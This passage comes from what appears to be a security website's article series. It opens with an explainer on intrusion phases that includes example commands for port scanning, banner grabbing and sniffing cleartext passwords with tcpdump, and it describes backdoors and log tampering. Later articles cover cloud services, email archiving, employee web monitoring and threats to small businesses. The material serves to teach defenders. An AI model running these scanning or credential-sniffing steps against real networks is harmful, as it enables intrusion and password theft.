The more naive of the lot (or the ones who know that security logs are never looked at) may simply run a vulnerability scanner such as Nessus or Retina over the network. This will ease their work.
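
A quieter first step is a plain port and version scan with a tool such as Nmap; a sketch against a placeholder address range:

nmap -sS -sV -O 203.0.113.0/24
# -sS: TCP SYN scan, -sV: probe service versions, -O: try to guess the operating system

The output gives the attacker a list of live hosts, the services they expose and, usually, the software versions behind them.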

Exploitation Phase

After determining which hosts are valid targets and figuring out what OS and version of software they are running (for example, which version of Apache or IIS the web server is running), the attacker can look for an exploit targeting that particular version. For example, if they find you are running an out-of-date version of Sendmail, they will look for an exploit targeting that version or below.
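
Version information is often given away by the service itself. Simply connecting to the SMTP port with netcat (the hostname here is a placeholder) will usually return a banner along these lines:

nc mail.example.com 25
220 mail.example.com ESMTP Sendmail 8.11.6/8.11.6; Mon, 5 Jan ...

That single line tells the attacker exactly which Sendmail release to look up.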

They will first look in their own collection of exploits, because they have tested these. If they cannot find one, they will turn to public repositories such as https://www.packetstormsecurity.nl. They will usually pick common exploits, as these are more likely to work and can be tested in their own lab first.

Once an exploit succeeds, they have already won half the game: they are behind the firewall and can probably see a lot more of the internal network than you ever intended them to. Many networks are very hard to penetrate from the outside but woefully unprotected internally. This hard exterior with a mushy interior is a recipe for trouble -- an attacker who penetrates the first line of defense will have the full run of your network.

After getting in, they will probably also install backdoors on this first compromised system to give themselves several ways back in, in case the original hole gets shut down. This is why, when you identify a machine that was broken into, it should be rebuilt from scratch: there is no way of knowing what kind of backdoors might be installed. It can be very tricky to find a program that runs itself from 2:00AM to 4:00AM every night and tries to connect to the attacker's machine. Once they have secured their access, the harder part of the intrusion is usually over.

Privilege Escalation Phase

Now the attacker will attempt to increase their security clearance on the network. They will usually target the administrator accounts, or perhaps a CEO's account. If they are focused on a specific target (say, your database server) they will look for the credentials of anyone with access to that resource. They will most likely set up a network sniffer to capture packets as they cross the network.
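
The sniffer does not have to be anything exotic. Even tcpdump, run on the compromised host, will happily collect cleartext logins; a sketch (the interface name and filter are illustrative):

tcpdump -i eth0 -w creds.pcap port 21 or port 23 or port 110
# captures FTP, Telnet and POP3 traffic, all of which carry passwords in the clear

The resulting capture file can be pulled back to the attacker's machine and searched at leisure.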

They will also start manually hunting around for documents that will give them some interesting information or leverage. Thus any sensitive documents should be encrypted or stored on systems with no connection to the network. This will be the time they use to explore your internal network.

They will look for windows machines with file sharing enabled and see what they can get out of these. Chances are if they didn't come in with a particular objective in mind (for example stealing a database), they will take whatever information they deem to be useful in some way.

Clean Up Phase

Now the attacker has either found what they were looking for, or is satisfied with the level of access they have. They have made sure that they have multiple paths into the network in case you close the first hole. They will now try to cover up any trace of the intrusion. They will manually edit log files to remove entries about themselves, and will hide any programs they have installed in hard-to-find places.

Remember, we are dealing with an intruder who is moderately skilled and is not just interested in defacing your website. They know that the only way to keep access will be if you never know something is amiss. In the event that there is a log they are unable to clean up, they may either take a risk leaving it there, or flood the log with bogus attacks, making it difficult for you to single out the real attack.


Where Can I Find More Information?

Without obviously plugging our site too much, the best place for answers to questions relating to this article is in our forums. The Security/Firewalls Forum is the best place to do this -- so you can ask anything from the most basic to the most advanced questions concerning network security there. A lot of common questions have already been answered in the forums, so you will quite likely find answers to questions like 'Which firewall should I use ?'.

As far as off-site resources are concerned, network security is a very vast field and there is seemingly limitless information on the subject. You will not learn it from so-called hacker sites full of programs. The best way to learn about network security is to deal with the first word first -- you should be able to talk networking inside and out, from packet header to checksum, layer 1 to layer 7.

Once you've got that down, you should start on the security aspect. Start by reading a lot of the papers on the net. Take in the basics first, and make sure you keep reading. Wherever possible, try to experiment with what you have read. If you don't have a home lab, you can build one 'virtually'. See the posts in the Cool Software forum about VMware.


Also, start reading security mailing lists such as Bugtraq and security-basics. Initially you may find yourself unable to understand a lot of what happens there, but the newest vulnerabilities are always announced on these lists. If you follow a vulnerability from the time it's discovered to when someone posts an exploit for it, you'll get a very good idea of how the security community works -- and you'll also learn a hell of a lot in the process.

If you're serious about security, it is imperative that you learn a programming language, or at least are able to understand code even if you don't write your own. The best choices are C and assembly language. Knowing Perl and Python is also valuable, as you can write programs in these languages very quickly.

For now, here are a few links that you can follow for more information:

www.securityfocus.com - A very good site with all the latest news, a very good library and tools collection as well as sections dedicated to basics, intrusion detection, penetration testing etc. Also home of the Bugtraq mailing list.

www.sans.org - A site with excellent resources in its reading room. People who submit papers there are trying for a certification, so it's mostly original material and of a very high calibre.

www.security-portal.com - A good general security site.

www.cert.org - The CERT coordination center provides updates on the latest threats and how to deal with them. Also has very good best practice tips for admins.

www.securityfocus.com/archive/1 - This is the link to Bugtraq, the best full disclosure security mailing list on the net. Here all the latest vulnerabilities get discussed way before you see them being exploited or in the press.

www.insecure.org - The mailing lists section has copies of Bugtraq, Full Disclosure, security-basics, security-news and so on. Also the home of Nmap, the wonderful port scanner.

seclists.org - This is a direct link to the security lists section of insecure.org.

www.grc.com - For Windows home users and newbies interested in a non-technical site. The site is home to Shields Up, which can test your home connection for file sharing vulnerabilities, run a port scan and more, all online. It can be a slightly melodramatic site at times though.

www.eeye.com - Home of the Retina security scanner, considered the industry leader. The eEye team also researches many of the latest vulnerabilities on the Windows platform.

www.nessus.org - Open source vulnerability scanner, and IMNSHO the best one going. If you're a tiger-team penetration tester and you don't point Nessus at a target, you're either really bad at your job or have a very large ego. If there's a known vulnerability in a system, Nessus will usually find it.

www.zonelabs.com - ZoneAlarm personal firewall for windows, considered the best, and also the market leader.

www.sygate.com - Sygate Personal Firewall, provides more configuration options than ZoneAlarm, but is consequently harder to use.

www.secinf.net - A huge selection of articles, mostly related to Windows security.

www.searchsecurity.com - A TechTarget site which you should sign up for; very good information. Chris writes for searchnetworking.com, its sister site. I don't think the references could be much better.

www.antioffline.com - A very good library section on buffer overflows etc.

www.packetstormsecurity.nl - The largest selection of tools and exploits possible.


Conclusion

This 5-page article should serve as a simple introduction to network security. The field itself is too massive to cover in any sort of article, and the amount of cutting edge research that goes on really defies comprehension.

Some of the most intelligent minds work in the security field because it can be a very challenging and stimulating environment. If you like to think out-of-the-box and are the sort of person willing to devote large amounts of your time to reading and questioning why things happen in a particular way, security might be a decent career option for you.

Even if you're not interested in it as a career option, every admin should be aware of the threats and the solutions. Remember, you have to think like them to stop them!

If you're interested in network security, we highly recommend you read through the networking and firewall sections of this website. Going through the whole site will be some of the most enlightening time you'll ever spend online.

If you're looking for a quick fix, here are a few of the more important areas that you might want to cover:

Introduction to Networking

Introduction to Firewalls

Introduction to Network Address Translation (NAT)

Denial Of Service (DoS) Attacks

Locking down Windows networks

Introduction to Network Protocols

Also check out our downloads section where you will find lots of very good security and general networking tools.

We plan on putting up a lot of other security articles in the near future. Some will be basic and introductory like this one, while some may deal with very technical research or techniques.

As always feel free to give us feedback and constructive criticism. All flames however will be directed to /dev/null ;)


Are Cloud-Based Services Overhyped?

In these hard economic times, cloud computing is becoming a more attractive option for many organizations. Industry analyst firm The 451 Group predicts that the marketplace for cloud computing will grow from $8.7bn in revenue in 2010 to $16.7bn by 2013. Accompanying this is an increasing amount of hype about cloud computing.

Cloud computing has gone through different stages, yet because the Internet only began to offer significant bandwidth in the 1990s, it became something for the masses over the last decade. Initial applications were known as Hosted Services. Then the term Application Service Provider emerged, with some hosted offerings known as Managed Services. More recently, in addition to these terms, Software as a Service (SaaS) became a catchphrase.  And as momentum for hosted offerings grew, SaaS is now complemented by Infrastructure as a Service, Platform as a Service, and even Hardware as a Service.

Is this a sign of some radical technology shift, or simply a bit more of what we have seen in the past? 

The answer is both. We are witnessing a great increase in global investment towards hosted offerings. These providers are expected to enjoy accelerated growth as Internet bandwidth becomes ubiquitous, faster, and less expensive; as network devices grow smaller; and as critical mass builds. Also, organizations are moving towards cloud services of all kinds through the use of different types of network devices – take, for example, the rise of smart phones, the iPad tablet, and the coming convergence of television and the Internet.

Yet, although cloud solutions may emerge as dominant winners in some emerging economies, on-premise solutions will remain in use. Start-ups and small businesses might find the cloud the cheaper and safer option for their business, enjoying the latest technology without needing to spend money on an IT infrastructure, staff, and the other expenses that come with on-premise solutions. Larger businesses, on the other hand, usually stick to on-premise solutions for both philosophical and practical reasons, such as wishing to retain control and the ability to configure products for their own specific needs.

Gartner's chief security analyst, John Pescatore, for example, believes that cloud security is not enough when it comes to the upper end of the enterprise, financial institutions, and the government. On the other hand, he states that smaller businesses may actually get better security from the cloud. The reason behind this is that while the former has to protect confidential data and cannot pass it on to third parties, the latter is given better security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more).

Although the cloud might appear to be finding its fertile ground only now, especially in these times of belt-tightening, hosted services have been around for a while. For this reason, when choosing a cloud provider, always make sure you choose a company that has proven itself in the marketplace.

 


What if it Rains in the Cloud?

Cloud computing has become a cost-effective model for small and medium-sized enterprises (SMEs) that wish to use the latest technology on demand, with no commitments and no need to purchase and manage software products. These features have made hosted services an attractive choice, such that industry analyst firm The 451 Group has predicted the marketplace for cloud computing will grow from $8.7 billion in revenue in 2010 to $16.7 billion by 2013.

Yet many organizations think twice when it comes to entrusting their data to third parties. Let's face it, almost every web user has an account on sites such as Gmail or Facebook, where personal information is stored on third-party servers; but when it comes to businesses allowing corporate data to pass through third parties, the danger and implications are greater, as an error affects a whole system, not just a single individual.

So The Question Arises: What If It Rains In The Cloud?

Some SMEs are apprehensive about using hosted services because their confidential data is being handled by third parties and because they believe the solution provider might fail. Funnily enough, it is usually the other way around: subject to selecting a reputable provider, smaller businesses can attain better security via cloud computing, as the solution provider usually invests more in security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more) than any individual small business could. Also, the second the service provider patches a security vulnerability, all customers are instantly protected, as opposed to downloadable patches that the IT team within a company must apply.

And, to prevent data leaks, cloud services providers make it their aim to invest in the best technology infrastructures to protect their clients' information, knowing that even the slightest mistake can ruin their reputation – not to mention potential legal claims – and, with that, their business.

A drawback with some hosted services is that if you decide to delete a cloud resource, this might not result in true wiping of the data. In some cases, adequate or timely deletion might be impossible, for example because the disk that needs to be destroyed also stores data from other clients. Also, certain organizations simply find it difficult to entrust their confidential data to third parties.

Use Your Umbrella

Cloud computing can be the better solution for many SMEs, particularly in the case of start-ups and small businesses which cannot afford to invest in a proper IT infrastructure. The secret is to know what to look for when choosing a provider: engage a provider that offers high availability and reliability. It would be wise to avoid cloud service providers that do not have much of a track record, that are of limited size and profitability, or that may be subject to M&A activity and changing development priorities.

To enjoy the full potential promised by the technology, it is important to choose a hosted service provider that has proven itself in the marketplace, has solid ownership and management, applies stringent security measures, uses multiple data centers so as to avoid a single point of failure, provides a solid service level agreement, and is committed to cloud services for the long term.

Follow these suggestions and you can have peace of mind that your data is unlikely to be subjected to ‘bad weather'!


Three Reasons Why SMEs Should Also Consider Cloud-Based Solutions

Small and medium enterprises (SMEs) are always looking for the optimum way to implement technology within their organizations, be it from a technical, financial or personal perspective. Technology solutions can be delivered using one of three common models: as on-premise solutions (i.e. installed on company premises), as hosted services (handled by an external third party), or as a mix of both. Let's take a look at cloud-based solutions in this brief post.

The Reasons for Cloud-based Backup Solutions

When talking about a hosted service, we are referring to a delivery model which enables SMEs to make the most of the latest technology through a third party. Cloud-based solutions and services are gaining popularity as an alternative strategy for businesses, especially for startups and small businesses, particularly when considering the three reasons below:

•  Financial – Startups and very small SMEs often find it financially difficult to set up the infrastructure and IT system required when they are starting or still building the business. The additional cost of building an IT infrastructure and recruiting IT personnel is at times too high, and not a priority when all they need is email and office tools. In such a scenario a hosted service makes sense because the company can depend on a third party to provide additional services, such as archiving and email filtering, at a monthly cost. This reduces costs and allows the business to focus on other important areas requiring investment. As the business grows, the IT needs of that company will dictate to what extent a hosted or managed service remains necessary and cost-effective.

•  Build your business – The cost-saving aspect is particularly important for those businesses that require only a basic IT infrastructure but still want to benefit from security and operational efficiency without heavy spending. Hosted / managed services give companies the option to test and try technologies before deciding whether to move their IT in-house or leave it in the hands of third parties.

•  Pay-as-you-go or rental basis – Instead of investing heavily in IT hardware, software and personnel, a pay-per-use or subscription system makes more sense. Companies choosing this delivery model would do well, however, to read contractual agreements carefully. Many vendors/providers tie in customers for two or three years, which may be just right for a startup SME, but companies should look closely at any associated costs if they decide to stop the service and at whether migrating their data will prove a very costly affair. The key to choosing a hosted or managed service is to do one's homework and plan well. Not all companies will find a cloud-based service to be suitable even if the cost structure appears to be attractive.

Are There Any Drawbacks To This System?

Despite all the advantages mentioned above, some SMEs are still apprehensive when it comes to cloud-based solutions because they are concerned about their data's security. Although an important consideration, a quality cloud-based provider will have invested heavily in security and, more often than not, in systems that are beyond what a small business can afford to implement. A good provider will have invested in multiple backup locations, 24/7 monitoring, physical security to protect sites, and more.

On the other hand, the fact that the data would be exposed to third parties and not handled internally could be seen as a drawback by some companies, especially those handling sensitive data. As stated earlier, beware of the fine print and medium- to long-term costs before committing.

Another Option

If you're a server-hugger and need to have that all-important server close to your office, you can always combine your on-premise solution with a hosted or managed service – benefiting from the advantages of both while doing away with the inherent disadvantages.

Every company is different and whether you decide to go for a cloud-based solution or not, keep in mind that there is no right or wrong – it's all a matter of what your current business's infrastructure is like and your needs at the time. However, if you are a startup or a small business, cloud-based solutions are an attractive option worth taking into consideration.

 


61% of SMEs use Email Archiving in-house – What About the Others?

A recent survey on email archiving, based on 202 US-based SMEs, found that a growing number of organizations are considering or would consider a third-party hosted email archiving service. A total of 18% of the organizations that already use an email archiving solution have opted for a hosted service, while 38% said they are open to using such a service.

At the same time, 51% of those surveyed said they would still only use an on-premise email archiving solution.

The findings paint an interesting picture of email archiving use among SMEs. Apart from the shocking statistic that more than 63% do not archive their email, those that do, or consider doing so, are interested in the various options available.


On-premise or Hosted?

An increasing number of IT services are now offered as Software as a Service (SaaS) or hosted by a third party. Many services prove to be very cost effective when implemented at the scale which outsource service providers can manage, but there are still many admins – as the survey shows – who prefer to keep everything in house; security personnel who want to maintain data integrity internally, and business leaders who do not see the value of a cloud solution for their organization because their requirements dictate otherwise.

What is Email Archiving?

At its simplest, email archiving technology helps businesses maintain a copy of all emails sent or received by all users. This indispensable solution can be used for searches, to meet eDiscovery, compliance audit and review requirements, to increase the overall long-term storage capacity of the email system, and as a disaster recovery repository to ensure data availability.

Because email is so heavily tied to the internet, email archiving can readily be outsourced to service providers and can often be combined with other outsourced services like spam and malware filtering. Hosted email archiving eases the load on your IT staff, allowing them to focus on core activities, and can be a more economical solution than paying for additional servers, storage, and tape backups. It does of course require you to entrust your data to a third party, and often this is where companies may opt for an internal solution.

An internal email archiving solution, on the other hand, requires only minimal care and feeding, and offers the advantage of maintaining all data internally.

Email archiving solutions are essential for businesses of any size, and organizations should consider the pros and cons of both hosted and on-premises email archiving, then deploy the solution which best suits their company's budget and needs.


Email Security - Can't Live Without It!

This white paper explains why antivirus software alone is not enough to protect your organization against the current and future onslaught of computer viruses. Examining the different kinds of email threats and email attack methods, this paper describes the need for a solid server-based content-checking gateway to safeguard your business against email viruses and attacks as well as information leaks.

We apologize but this paper is no longer available. Back to the Security Articles section.


Log-Based Intrusion-Detection and Analysis in Windows Servers

Introduction - How to Perform Network-Wide Security Event Log Management

Microsoft Windows machines have basic audit facilities but they fall short of fulfilling real-life business needs (i.e., monitoring Windows computers in real time, periodically analyzing security activity, and maintaining a long-term audit trail). Therefore, the need exists for a log-based intrusion detection and analysis tool such as EventsManager.

This paper explains how EventsManager's innovative architecture can fill the gaps in Windows' security log functionality – without hurting performance and while remaining cost-effective. It discusses the use of EventsManager to implement best practice and fulfill due diligence requirements imposed by auditors and regulatory agencies, and provides strategies for making maximum use of GFI EventsManager's capabilities.

This white paper is no longer available by the vendor. To read similar interesting security articles, please visit our Security Articles section.


Web Monitoring for Employee Productivity Enhancement

All too often, when web monitoring and Internet use restrictions are put into place, they hurt company morale and do little to enhance employee productivity. Not wanting to create friction in the workplace, many employers shy away from using what could be a significant productivity enhancement tool. Wasting time through Internet activities is simple, and it's a huge hidden cost to business. Just answering a few personal e-mails, checking the sports scores, reading the news headlines and checking to see how your bid is holding up can easily waste an hour of time each day. If the company has an 8-person CAD department and each of them spends an hour a day on the above activities, that's a whole employee wasted!

Employees both want and don't want to have their Internet use restricted. The key to gaining productivity and employee acceptance is the perception of fairness, clear goals and self-enforcement.

Why Employees Don’t Want Internet Blocking

  1. They don’t know what is blocked and what is allowed. This uncertainty creates fear that they may do “something” that could hurt their advancement opportunities or worse jeopardize their job.
  2. Someone ruined it for everyone and that person still works here. When everyone is punished, no one is happy. Resentment builds against the employee known to have visited inappropriate websites.
  3. There’s no procedure in place for allowing an employee access to a blocked website. When an employee finds that a website they tried to access is blocked, what do they do? Certainly this indiscretion is going to show up on a report somewhere. What if they really need that site? Is there a procedure in place for allowing this person to access it?

Uncertainty is fodder for loss of morale. In today’s economic climate employees are especially sensitive to any action that can be perceived as clamping down on them. Therefore a web monitoring program must be developed that can be viewed in a positive light by all employees.

Why Employers are Afraid of Internet Blocking

  • The potential of adding to IT costs and human resources headaches takes away the value of web monitoring. The Internet is a big place and employees are smart. Employers don't want to get into a situation where they are simply chasing their tail, trading one productivity loss for incurred costs and frustration elsewhere.
  • Employers want to allow employee freedom. There is general recognition by employers that a happy employee is a loyal, productive employee. Allowing certain freedoms creates a more satisfying work environment. The impact of taking that away may cause good employees to leave, and an increase in turnover can be costly.

The fear of trading one cost for another, or one headache for another, has prevented many employers from implementing Internet monitoring and blocking. A mistrust of IT services may also come into play. Technology got us into this situation, where up to 20% of employee time is spent on the Internet, and many employers don't trust that technology can also help them regain that productivity. A monitoring program needs to be simple to implement and maintain.

Why Employees Want Internet Controls

  • Employees are very aware of what their co-workers are doing or not doing. If an employee in the office spends an hour every day monitoring their auctions on eBay, reading personal e-mail or chatting on IM, every other employee in the office knows it and resents it. If they are working hard, everyone else should be too.
  • Unfortunately pornographic and other offensive material finds its way into the office when the Internet is unrestricted. Exposure to this material puts the employee in a difficult situation. Do they tell the boss? Do they try to ignore it? Do they talk to the employee themselves? The employee would rather not be put into this situation.
  • Employees want to work for successful, growing companies. Solid corporate policies that are seen as a necessary means to continue to propel the company forward add to employee satisfaction. Web monitoring can be one of those policies.

How Employers can Gain Employee Support for Web Monitoring

  • Provide a clear, fair policy statement and expose the reasoning and goals. Keep it simple. Employees won’t read a long policy position paper. Stick to the facts and use positive language.
  • Policies that make sense to staff are easy to enforce
  • Policies with goals are easy to measure
  • When the goal has been reached celebrate with your employees in a big way. Everyone likes to feel like part of the team.
  • Empower your employees. Whitelist, don't blacklist. Let each employee actively participate in deciding which sites are allowed and which aren't for them. Let the employee tell you what they need to be most productive and then provide it, no questions asked (a simple proxy configuration sketch follows this list).
  • Most job positions can be boiled down to between 5 and 20 websites. Employees know what they need. Ask them to provide a list.
  • Show employees the web monitoring reports. Let them see the before and after and let them see the on-going reports. This will encourage self monitoring. This is an enforcement tool in disguise. Employees know that management can view these reports too and will take care that they make them look good.
  • Send employees a weekly report on their Internet usage. They will look at it and act upon it to make sure they are portrayed to management in the best light, and may even compare themselves against others.
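
One common way to implement the 'whitelist, don't blacklist' idea is at the web proxy. A minimal sketch for Squid, assuming the allowed sites are kept in a plain text file (the file path and ACL name are illustrative):

# /etc/squid/whitelist.txt holds one domain per line, e.g. .supplier-portal.com
acl allowed_sites dstdomain "/etc/squid/whitelist.txt"
http_access allow allowed_sites
http_access deny all

Adding a site an employee asks for is then a one-line change followed by a configuration reload.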

Summary

Web monitoring is good for business. The Internet as a productivity tool has wide acceptance, but recent changes have brought new distractions, costing business some of those productivity gains. Internet use can be controlled, but it needs to be controlled in a way that allows for employee buy-in, self-monitoring and self-enforcement if it is to be successful.


Security Threats: A Guide for Small & Medium Businesses

A successful business works on the basis of revenue growth and loss prevention. Small and medium-sized businesses are particularly hit hard when either one or both of these business requirements suffer. Data leakage, down-time and reputation loss can easily turn away new and existing customers if such situations are not handled appropriately and quickly. This may, in turn, impact on the company’s bottom line and ultimately profit margins. A computer virus outbreak or a network breach can cost a business thousands of dollars. In some cases, it may even lead to legal liability and lawsuits.

The truth is that many organizations would like to have a secure IT environment but very often this need comes into conflict with other priorities. Firms often find the task of keeping the business functions aligned with the security process highly challenging. When economic circumstances look dire, it is easy to turn security into a checklist item that keeps being pushed back. However the reality is that, in such situations, security should be a primary issue. The likelihood of threats affecting your business will probably increase and the impact can be more detrimental if it tarnishes your reputation. This paper aims to help small and medium-sized businesses focus on threats that are likely to have an impact on, and affect, the organization.

These threats specifically target small and medium-sized businesses rather than enterprise companies or home users.

Security Threats That Affect SMBs - Malicious Internet Content

Most modern small or medium-sized businesses need an Internet connection to operate. If you remove this means of communication, many areas of the organization will not be able to function properly or else they may be forced to revert to old, inefficient systems. Just think how important email has become and that for many organizations this is the primary means of communication. Even phone communications are changing shape, with Voice over IP becoming a standard in many organizations. At some point, most organizations have been the victim of a computer virus attack.

While many may have antivirus protection, it is not unusual for an organization of more than 10 employees to use email or the internet without any form of protection. Even large organizations are not spared. Recently, three hospitals in London had to shut down their entire network due to an infection of a version of a worm called Mytob. Most of the time we do not hear of small or medium-sized businesses becoming victims of such infections because it is not in their interest to publicize these incidents. Many small or medium-sized business networks cannot afford to employ prevention mechanisms such as network segregation.

These factors simply make it easier for a worm to spread throughout an organization. Malware is a term that includes computer viruses, worms, Trojans and any other kinds of malicious software. Employees and end users within an organization may unknowingly introduce malware on the network when they run malicious executable code (EXE files). Sometimes they might receive an email with an attached worm or download spyware when visiting a malicious website. Alternatively, to get work done, employees may decide to install pirated software for which they do not have a license. This software tends to have more code than advertised and is a common method used by malware writers to infect the end user's computers. An organization that operates efficiently usually has established ways to share files and content across the organization. These methods can also be abused by worms to further infect computer systems on the network.

Computer malware does not have to be introduced manually or consciously. Basic software packages installed on desktop computers such as Internet Explorer, Firefox, Adobe Acrobat Reader or Flash have their fair share of security vulnerabilities. These security weaknesses are actively exploited by malware writers to automatically infect victims' computers. Such attacks are known as drive-by downloads because the user does not have knowledge of malicious files being downloaded onto his or her computer. In 2007 Google issued an alert describing 450,000 web pages that can install malware without the user's consent.

Then You Get Social Engineering Attacks

This term refers to a set of techniques whereby attackers make the most of weaknesses in human nature rather than flaws within the technology. A phishing attack is a type of social engineering attack that is normally opportunistic and targets a subset of society. A phishing email message will typically look very familiar to the end users – it will make use of genuine logos and other visuals (from a well-known bank, for example) and will, for all intents and purposes, appear to be the genuine thing. When the end user follows the instructions in the email, he or she is directed to reveal sensitive or private information such as passwords, pin codes and credit card numbers.

Employees and desktop computers are not the only target in an organization. Most small or medium-sized companies need to make use of servers for email, customer relationship management and file sharing. These servers tend to hold critical information that can easily become a target of an attack. Additionally, the move towards web applications has introduced a large number of new security vulnerabilities that are actively exploited by attackers to gain access to these web applications. If these services are compromised there is a high risk that sensitive information can be leaked and used by cyber-criminals to commit fraud.

Attacks on Physical Systems

Internet-borne attacks are not the only security issue that organizations face. Laptops and mobiles are entrusted with the most sensitive of information about the organization. These devices, whether they are company property or personally owned, often contain company documents and are used to log on to the company network. More often than not, these mobile devices are also used during conferences and travel, thus running the risk of physical theft.

The number of laptops and mobile devices stolen per year is ever on the increase. Attrition.org had over 400 articles in 2008 related to high profile data loss, many of which involved stolen laptops and missing disks. If it happens to major hospitals and governments that have established rules on handling such situations, why should it not happen to smaller businesses?

Another Threat Affecting Physical Security is that of Unprotected Endpoints

USB ports and DVD drives can both be used to leak data and introduce malware on the network. A USB stick that is mainly used for work and may contain sensitive documents becomes a security risk if it is taken home, left lying around and used by other members of the family on their home PC. While the employee may understand the sensitive nature of the information stored on the USB stick, the rest of the family will probably not.

They may copy files back and forth without considering the implications. This is typically a case of negligence, but it can also be the work of a targeted attack, where internal employees take large amounts of information out of the company.

Small and medium-sized businesses may overlook the importance of securing the physical network and server room to prevent unauthorized persons from gaining access. Open network points and unprotected server rooms can allow disgruntled employees and visitors to connect to the network and launch attacks such as ARP spoofing to capture unencrypted network traffic and steal passwords and content.

Authentication and Privilege Attacks

Passwords remain the number one vulnerability in many systems. It is not an easy task to have a secure system whereby people are required to choose a unique password that others cannot guess but that is still easy for them to remember. Nowadays most people have at least five other passwords to remember, and the password used for company business should not be the same one used for webmail accounts, site memberships and so on. High-profile intrusions such as the one on Twitter (the password was 'happiness') clearly show that passwords are often the most common and universal security weakness, and attacks exploiting this weakness do not require a lot of technical knowledge.

Password policies can go a long way to mitigate the risk, but if the password policy is too strict people will find ways and means to get around it. They will write the password on sticky notes, share it with their colleagues or simply pick a keyboard pattern (1q2w3e4r5t) that is easy to remember but also easy to guess.

Most complex password policies can easily be rendered useless by non-technological means.

In small and medium-sized businesses, systems administrators are often found to be doing the work of the network operators and project managers as well as security analysts. Therefore a disgruntled systems administrator will be a major security problem due to the amount of responsibility (and access rights) that he or she holds. With full access privileges, a systems administrator may plant a logic bomb, create backdoor accounts or leak sensitive company information that may greatly affect the stability and reputation of the organization. Additionally, in many cases the systems administrator is the person who sets the passwords for important services or servers. When he or she leaves the organization, these passwords may not be changed (especially if not documented), thus leaving a backdoor for the ex-employee.

A startup company called JournalSpace was caught with no backups when their former system administrator decided to wipe out the main database. This proved to be disastrous for the company, which ended up asking users to retrieve their content from Google's cache.

The company's management team may also have administrative privileges on their personal computers or laptops. The reasons vary, but they may want to be able to install new software or simply to have more control of their machines. The problem with this scenario is that one compromised machine is all that an attacker needs to target an organization.

The firm itself does not need to be specifically picked out but may simply become a victim of an attack aimed at a particular vulnerable software package. Even when user accounts on the network are supposed to have reduced privileges, there may be times where privilege creep occurs. For example, a manager that hands over an old project to another manager may retain the old privileges for years even after the handover! When his or her account is compromised, the intruder also gains access to the old project.

Employees with mobile devices and laptop computers can pose a significant risk when they make use of unsecured wireless networks whilst attending a conference or during their stay at a hotel. In many cases, inadequate or no encryption is used and anyone 'in between' can view and modify the network traffic. This can be the start of an intrusion leading to compromised company accounts and networks.

Denial Of Service

In an attempt to minimize costs, or simply through negligence, most small and some medium-sized businesses have various single points of failure. Denial of service is an attack that prevents legitimate users from making use of a service, and it can be very hard to prevent. The means of carrying out a DoS attack and the motives may vary, but it typically leads to downtime and legitimate customers losing confidence in the organization - and it is not necessarily due to an Internet-borne incident.

In 2008 many organizations in the Mediterranean Sea basin and in the Middle East suffered Internet downtime due to damage to the underwater Internet cables. Some of these organizations relied on a single Internet connection, and their business was driven by Internet communications.

Having such a single point of failure proved to be very damaging for these organizations in terms of lost productivity and lost business. Reliability is a major concern for most businesses and their inability to address even one single point of failure can be costly. If an organization is not prepared for a security incident, it will probably not handle the situation appropriately.

One question that needs to be asked is: if a virus outbreak does occur, who should handle the various steps that need to be taken to get the systems back in shape? If an organization is simply relying on the systems administrator to handle such incidents, then that organization is not acknowledging that such a situation is not simply technical in nature. It is important to be able to identify the entry point, to approach the persons concerned and to have policies in place to prevent future occurrences - apart from simply removing the virus from the network! If all these tasks are left to a systems administrator, who might have to do everything ad hoc, then that is a formula for lengthy downtime.

Addressing Security Threats - An Anti-virus is not Optional

The volume of malware that can hit organizations today is enormous and the attack vectors are multiple. Viruses may spread through email, websites, USB sticks, and instant messenger programs, to name but a few. If an organization does not have an anti-virus installed, the safety of the desktop computers will be at the mercy of the end user – and relying on the end user is not advisable or worth the risk.

Protecting desktop workstations is only one recommended practice. Once virus code is present on a desktop computer, it becomes a race between the virus and the anti-virus. Most malware has functionality to disable your anti-virus software, firewalls and so on. Therefore you do not want the virus to get to your desktop computer in the first place! The solution is to deploy content filtering at the gateway.

Anti-virus can be part of the content filtering strategy which can be installed at the email and web gateway. Email accounts are frequently spammed with malicious email attachments. These files often appear to come from legitimate contacts, thus fooling the end user into running the malware code. Leaving the decision to the user whether or not to trust an attachment received by email is never a good idea.

By blocking malware at the email gateway, you are greatly reducing the risk that end users may make a mistake and open an infected file. Similarly, scanning all incoming web (HTTP) traffic for malicious code addresses a major infection vector and is a requirement when running a secure network environment.
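
Open-source engines such as ClamAV are often used for exactly this kind of gateway scanning. As a minimal illustration (the quarantine directory is a placeholder), a mail quarantine folder can be swept like this:

freshclam                                      # update the signature database first
clamscan --recursive --infected /var/spool/quarantine
# --recursive walks subdirectories, --infected prints only files that match a signature

In a production gateway the same engine would normally be wired into the mail or proxy server rather than run by hand.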

Security Awareness

A large percentage of successful attacks do not necessarily exploit technical vulnerabilities. Instead they rely on social engineering and people's willingness to trust others. There are two extremes: either employees in an organization totally mistrust each other, to such an extent that the sharing of data or information is nil; or, at the other end of the scale, you have total trust between all employees.

In organizations neither approach is desirable. There has to be an element of trust throughout an organization, but checks and balances are just as important. Employees need to be given the opportunity to work and share data, but they must also be aware of the security issues that arise as a result of their actions. This is why a security awareness program is so important.

For example, malware often relies on victims to run an executable file to spread and infect a computer or network. Telling your employees not to open emails from unknown senders is not enough. They need to be told that in so doing they risk losing all their work, their passwords and other confidential details to third parties. They need to understand what behavior is acceptable when dealing with email and web content. Anything suspicious should be reported to someone who can handle security incidents. Having open communication across different departments makes for better information security, since many social engineering attacks abuse the communication breakdowns across departments.

Additionally, it is important to keep in mind that a positive working environment, where people are happy in their job, is less susceptible to insider attacks than an oppressive workplace.

Endpoint Security

A lot of information in an organization is not centralized. Even when there is a central system, information is often shared between different users and different devices, and copied numerous times. In contrast with perimeter security, endpoint security is the concept that each device in an organization needs to be secured. It is recommended that sensitive information is encrypted on portable devices such as laptops.

Additionally, removable storage such as DVD drives, floppy drives and USB ports may be blocked if they are considered to be a major threat vector for malware infections or data leakage.

Securing endpoints on a network may require extensive planning and auditing. For example, policies can be applied that state that only certain computers (e.g. laptops) can connect to specific networks. It may also make sense to restrict usage of wireless (WiFi) access points.

Policies

Policies are the basis of every information security program. It is useless taking security precautions or trying to manage a secure environment if there are no objectives or clearly defined rules. Policies clarify what is or is not allowed in an organization as well as define the procedures that apply in different situations. They should be clear and have the full backing of senior management. Finally, they need to be communicated to the organization's staff and enforced accordingly.

